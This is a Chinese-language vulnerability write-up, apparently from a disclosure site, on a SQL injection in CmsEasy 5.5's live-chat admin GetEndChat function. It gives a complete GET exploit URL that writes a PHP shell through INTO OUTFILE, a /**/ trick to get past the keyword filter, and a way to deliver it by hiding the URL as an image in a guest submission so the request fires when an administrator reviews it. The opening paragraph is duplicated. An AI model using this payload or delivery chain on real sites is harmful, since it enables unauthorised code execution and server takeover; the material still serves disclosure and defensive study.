### 简要描述: 上一次做了一个csrf+sql注入getshell的 这一次我继续发一个,由于此属于一个get类型的,所以很简单的,管理员根本就不用去点击,就能触发sql并且getshell ### 详细说明: 首先我们分析一下sql语句: admin/live/header.php:(line:16-21) ``` include('../../include/config.inc.php'); include(CE_ROOT.'/include/admin/check.inc.php'); include(CE_ROOT.'/include/celive.class.php'); $admin_header = new celive(); $admin_header->template(); $admin_header->admin_xajax_live(); ``` 然后我们跟到admin_xajax_live这个函数里面看看: ``` function admin_xajax_live() { if (!$this->admin_xajax_live_flag) { $this->admin_xajax_live_flag=true; include_once(dirname(__FILE__).'/xajax.inc.php'); include_once(dirname(__FILE__).'/xajax.class.php'); global $admin_xajax_live; $admin_xajax_live=new xajax(); $admin_xajax_live->setCharEncoding('utf-8'); $admin_xajax_live->decodeUTF8InputOn(); $admin_xajax_live->registerFunction('ChangeStatus'); $admin_xajax_live->registerFunction('AdminResponse'); $admin_xajax_live->registerFunction('AdminSound'); $admin_xajax_live->registerFunction('AdminDecline');...
### 简要描述: 上一次做了一个csrf+sql注入getshell的 这一次我继续发一个,由于此属于一个get类型的,所以很简单的,管理员根本就不用去点击,就能触发sql并且getshell ### 详细说明: 首先我们分析一下sql语句: admin/live/header.php:(line:16-21) ``` include('../../include/config.inc.php'); include(CE_ROOT.'/include/admin/check.inc.php'); include(CE_ROOT.'/include/celive.class.php'); $admin_header = new celive(); $admin_header->template(); $admin_header->admin_xajax_live(); ``` 然后我们跟到admin_xajax_live这个函数里面看看: ``` function admin_xajax_live() { if (!$this->admin_xajax_live_flag) { $this->admin_xajax_live_flag=true; include_once(dirname(__FILE__).'/xajax.inc.php'); include_once(dirname(__FILE__).'/xajax.class.php'); global $admin_xajax_live; $admin_xajax_live=new xajax(); $admin_xajax_live->setCharEncoding('utf-8'); $admin_xajax_live->decodeUTF8InputOn(); $admin_xajax_live->registerFunction('ChangeStatus'); $admin_xajax_live->registerFunction('AdminResponse'); $admin_xajax_live->registerFunction('AdminSound'); $admin_xajax_live->registerFunction('AdminDecline'); $admin_xajax_live->registerFunction('AdminChatHistory'); $admin_xajax_live->registerFunction('AdminPostdata'); $admin_xajax_live->registerFunction('EndChats'); $admin_xajax_live->registerFunction('GetEndChat'); $admin_xajax_live->registerFunction('AdminExit'); $admin_xajax_live->processRequests(); } } ``` 看到注册函数这里了有一个GetEndChat: ``` function GetEndChat($chatid) { global $db; $objResponse = new xajaxResponse('utf-8'); $sql = "SELECT `status` FROM `chat` WHERE `id`='" . $chatid . "'"; @$result = $db->query($sql); if ($result[0]['status'] == 0) { $objResponse->script("alert('<?php echo $lang[reception]?>');window.parent.close();"); } return $objResponse; } ``` 然而这个$chatid没有做任何过滤就被传递进来了,之前有人对这里前台进行分析过: http://site.com/CmsEasy_5.5_UTF-8_20140818/uploads/celive/admin/live/header.php?xajax=GetEndChat&xajaxargs=xxxxx' union select/**/'<?php phpinfo?>' into outfile 'D:/APMSERVER/APMServ5.2.6/www/htdocs/CmsEasy_5.5_UTF-8_20140818/uploadshttps://images.seebug.org/upload/images/shell.php'# 这里我们要说明一下,由于全局对危险函数做了过滤和检测select后面要是不添加/**/这里是被拦截的 然后我们队此url进行url编码: 下来我们以游客身份进行投稿: [<img src="https://images.seebug.org/upload/201409/0313063357b972f1c5753546b6196acd3a99154b.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/0313063357b972f1c5753546b6196acd3a99154b.png) 到这里大家应该就明白了,管理员是要审核的,我们这里把这个get链接,发给了一个图片,管理员审核的时候,看到图片其实我们的请求就已经发出去了,当然了在响应的目录下面也已经生成了,shellcode [<img src="https://images.seebug.org/upload/201409/03130815fa31a5a01706ac553d50d81b883ed4de.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/03130815fa31a5a01706ac553d50d81b883ed4de.png) 我们再看看uploads/img底下有没有我们想要的文件: [<img src="https://images.seebug.org/upload/201409/03130917d543aca1cb03a8a179d976cae246436f.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/03130917d543aca1cb03a8a179d976cae246436f.png) 对了这里差两个括号,补上就是了。。。。。。 ok到此............. ### 漏洞证明:
